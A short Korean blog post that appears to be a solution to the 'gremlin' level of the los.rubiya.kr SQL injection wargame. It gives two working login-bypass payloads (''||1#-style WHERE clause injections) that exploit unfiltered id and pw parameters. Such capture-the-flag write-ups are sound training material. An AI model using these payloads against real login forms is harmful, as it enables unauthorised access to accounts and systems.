소스 코드를 살펴보면 $_GET[id], $_GET[pw] 에 딱히 필터링이 되어있지 않고 쿼리의 결과값이 admin 일때 문제가 해결이 된다.
pw 를 입력하는 곳에는 md5 함수가 있긴 하지만 SQL Injection 을 하는데엔 지장이 없다.
$_GET[id] -> Red
$_GET[pw] -> Blue
where id=''||1#' and pw=md5('')
where id=''' and pw=md5('')||1#')
등 다양하게 공격이 가능하다.
끝!
los.rubiya.kr/darkelf (0) | 2018.11.15 |
---|---|
los.rubiya.kr/wolfman (0) | 2018.11.15 |
los.rubiya.kr/orc (0) | 2018.11.15 |
los.rubiya.kr/goblin (0) | 2018.11.11 |
los.rubiya.kr/gremlin (0) | 2018.11.11 |